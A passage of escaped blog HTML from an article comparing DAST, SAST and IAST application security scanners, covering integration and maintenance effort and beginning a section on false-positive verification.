&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Possible,
  Policy Specific&lt;/span&gt;&lt;span style=&quot;color: #00b050; font-size: 16.0pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 107.75pt;&quot; valign=&quot;top&quot; width=&quot;144&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 10.0pt;&quot;&gt;Create Test Policies&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Define&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size: 10.6667px;&quot;&gt;test plugins, &quot;record&quot; traffic, set threads, custom pages, and input vectors&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;color: red; font-size: 8.0pt;&quot;&gt;&lt;b&gt;Situational&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 94.5pt;&quot; valign=&quot;top&quot; width=&quot;126&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Possible,
  Policy Specific&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 1.25in;&quot; valign=&quot;top&quot; width=&quot;120&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: red;&quot;&gt;X&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Not Required&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 81.0pt;&quot; valign=&quot;top&quot; width=&quot;108&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: #00b0f0; font-size: 16.0pt;&quot;&gt;?&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: 16.0pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Coverage
  Optimization&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 94.25pt;&quot; valign=&quot;top&quot; width=&quot;126&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Possible,
  Policy Specific&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 107.75pt;&quot; valign=&quot;top&quot; width=&quot;144&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 10.0pt;&quot;&gt;Aggregate Sources &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Aggregate sources from key homegrown
  libraries (fragmented source projects)&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: 10.0pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;color: red; font-size: 8.0pt;&quot;&gt;&lt;b&gt;Situational&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 94.5pt;&quot; valign=&quot;top&quot; width=&quot;126&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: red;&quot;&gt;X&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Not Required&lt;/span&gt;&lt;span style=&quot;color: #00b050; font-size: 16.0pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 1.25in;&quot; valign=&quot;top&quot; width=&quot;120&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Possible,
  Policy Specific&lt;/span&gt;&lt;span style=&quot;color: red; font-size: 16.0pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 81.0pt;&quot; valign=&quot;top&quot; width=&quot;108&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: red;&quot;&gt;X&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Not Required&lt;/span&gt;&lt;span style=&quot;color: #00b050; font-size: 16.0pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 94.25pt;&quot; valign=&quot;top&quot; width=&quot;126&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: red;&quot;&gt;X&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Not Required&lt;/span&gt;&lt;span style=&quot;color: #00b050; font-size: 16.0pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 107.75pt;&quot; valign=&quot;top&quot; width=&quot;144&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 10.0pt;&quot;&gt;Maintain Policies&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Update scan policies in major changes
  in relatively &lt;b&gt;complex&lt;/b&gt; applications&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: 10.0pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;color: red; font-size: 8.0pt;&quot;&gt;&lt;b&gt;Situational&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 94.5pt;&quot; valign=&quot;top&quot; width=&quot;126&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Possible,
  Policy Specific&lt;/span&gt;&lt;span style=&quot;color: red; font-size: 16.0pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 1.25in;&quot; valign=&quot;top&quot; width=&quot;120&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: #00b0f0; font-size: 16pt;&quot;&gt;?&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 10.6667px;&quot;&gt;Source Code Path / Code Fragmentation&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 81.0pt;&quot; valign=&quot;top&quot; width=&quot;108&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: #00b0f0; font-size: 16pt;&quot;&gt;?&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Agent Re-install&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 94.25pt;&quot; valign=&quot;top&quot; width=&quot;126&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Possible,
  Policy Specific&lt;/span&gt;&lt;span style=&quot;color: red; font-size: 16.0pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
To simplify the analysis of the data, we will present the&amp;nbsp;&lt;b&gt;integration /&lt;/b&gt;&amp;nbsp;&lt;b&gt;maintenance&amp;nbsp;&lt;/b&gt;requirements in charts describing&lt;u&gt; two main scenarios&lt;/u&gt;:&lt;br /&gt;
1) A typical scan of an unauthenticated OR common application with FORM/HTTP authentication,&lt;br /&gt;
2) A scan of a (relatively) complex application, with micro-service architecture, scan barriers (anti-CSRF mechanisms, multi-phase processes, etc), or similar complex prerequisites:&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;color: cyan;&quot;&gt;&lt;b&gt;Click to Enlarge&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgY1bmNPbUJvmcbkP8hTp2vz6eg6SFDqiZRhqCOiol5sKyu84WzidFFpqlTUZpZz0SEzAxwmGCd3Gi4aESdGBFP27qrM6vQqSk1TIY7PbDF19AzIMe1DqwR72UxPxvCUWlKs5CJouO4SMI/s1600/Integration-SIMPLE-Apps.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;900&quot; data-original-width=&quot;1600&quot; height=&quot;360&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgY1bmNPbUJvmcbkP8hTp2vz6eg6SFDqiZRhqCOiol5sKyu84WzidFFpqlTUZpZz0SEzAxwmGCd3Gi4aESdGBFP27qrM6vQqSk1TIY7PbDF19AzIMe1DqwR72UxPxvCUWlKs5CJouO4SMI/s640/Integration-SIMPLE-Apps.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;color: cyan;&quot;&gt;&lt;b&gt;Click to Enlarge&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRdytKvMlqx83SLdyLKHilP_j2aJG5au_bfsHAJCVrb0mOudu97dLFfhXLKbnVNJTRDt6bfKDNa0D585Yk12P1fq0-tCs_M2XaN_DccjvJQ7YlMW36eOR7i1ExNAt55eIlCxmt9Ke548g/s1600/Integration-COMPLEX-Apps.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;900&quot; data-original-width=&quot;1600&quot; height=&quot;360&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRdytKvMlqx83SLdyLKHilP_j2aJG5au_bfsHAJCVrb0mOudu97dLFfhXLKbnVNJTRDt6bfKDNa0D585Yk12P1fq0-tCs_M2XaN_DccjvJQ7YlMW36eOR7i1ExNAt55eIlCxmt9Ke548g/s640/Integration-COMPLEX-Apps.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
From the point of view of integration, some tools are easier to integrate than others, some have very little or no effort required for maintenance, and some require a specific scan policy in order to maximize the result efficiency.&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
To summarize the topic &amp;nbsp;:&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;SAST&lt;/b&gt; - In an environment&amp;nbsp;&lt;b&gt;without&amp;nbsp;&lt;/b&gt;any live application instances, SAST solutions can still be used to scan source code repositories, either directly or through the upload of source code projects, simplifying the initial assessment process, and making the integration of SAST relatively simple compared to alternatives.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Passive IAST&lt;/b&gt; - In an environment &lt;b&gt;with&lt;/b&gt; live application instances, IAST solutions can be integrated simply by deploying an agent to the assessed application baseline framework. Although the initial integration may be difficult (objection from developers/QA, dedicated servers, configuration, potential performance issues in shared environments, etc),&lt;b&gt; once the solution is set up&lt;/b&gt; there&#39;s very little maintenance .&lt;/li&gt;
&lt;li&gt;&lt;b&gt;DAST / Active IAST&lt;/b&gt; - In an environment &lt;b&gt;with&lt;/b&gt; live application instances, DAST solutions can be &lt;b&gt;easily&lt;/b&gt; used to scan unauthenticated applications and will require minor configuration to scan applications with FORMS/HTTP authentication. More complex authentication methods, scan barriers (e.g. anti-CSRF mechanisms) or diverse architectures (micro-service architecture, REST, WS, etc) may require the creation of a dedicated policy and/or manual crawling session recording, while in the case of Active IAST solutions, in addition to requiring all the DAST prerequisites, will also require deployment of agents to the various tested layers.&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;/div&gt;
Or in short, &lt;b&gt;SAST&lt;/b&gt; solutions are probably easier to integrate, &lt;b&gt;DAST&lt;/b&gt; and &lt;b&gt;Passive IAST&lt;/b&gt; compete in terms of ease of integration, and &lt;b&gt;Active IAST&lt;/b&gt; typically requires more effort to integrate than other solution categories (but provides adequately accurate results, as seen in the next section)&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;Effort of Weeding Out False Positives&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
The relative ratio of false positives derives from a number of methods that can be used by each technology to &lt;b&gt;verify&lt;/b&gt; that identified vulnerabilities are not false positives, in addition to the individual solution efficiency:&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: cyan;&quot;&gt;Click to Enlarge&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTKEvED3gEXf5U2rTsEYU9EVLHPme9jMqAOYoRedKsTR964RCZ6KnPvKy6XysZ1v-pZ_-_pt3riUR0wwrbIm03bPyK0ru69m43EKW1x2_QZ62YTU-Mobr64sc_SZLrVV7QVaUNoDXrd8c/s1600/Vulnerability-Verification-Methods.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;360&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTKEvED3gEXf5U2rTsEYU9EVLHPme9jMqAOYoRedKsTR964RCZ6KnPvKy6XysZ1v-pZ_-_pt3riUR0wwrbIm03bPyK0ru69m43EKW1x2_QZ62YTU-Mobr64sc_SZLrVV7QVaUNoDXrd8c/s640/Vulnerability-Verification-Methods.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
The justification for the chart diversity of the various solution categories stems from the verification methods that can be used by each solution category:&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0in 5.4pt 0in 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;background: #767171; border: solid windowtext 1.0pt; mso-background-themecolor: background2; mso-background-themeshade: 128; mso-border-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 107.75pt;&quot; valign=&quot;top&quot; width=&quot;144&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;background: #767171; border-left: none; border: solid windowtext 1.0pt; mso-background-themecolor: background2; mso-background-themeshade: 128; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 94.5pt;&quot; valign=&quot;top&quot; width=&quot;126&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;b&gt;DAST&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;background: #767171; border-left: none; border: solid windowtext 1.0pt; mso-background-themecolor: background2; mso-background-themeshade: 128; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 1.25in;&quot; valign=&quot;top&quot; width=&quot;120&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;b&gt;SAST&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;background: #767171; border-left: none; border: solid windowtext 1.0pt; mso-background-themecolor: background2; mso-background-themeshade: 128; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 85.5pt;&quot; valign=&quot;top&quot; width=&quot;114&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;b&gt;Passive IAST&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;background: #767171; border-left: none; border: solid windowtext 1.0pt; mso-background-themecolor: background2; mso-background-themeshade: 128; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 89.75pt;&quot; valign=&quot;top&quot; width=&quot;120&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;b&gt;Active IAST&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 107.75pt;&quot; valign=&quot;top&quot; width=&quot;144&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 10.0pt;&quot;&gt;Execution URL&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Client-Driven Exploitation &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
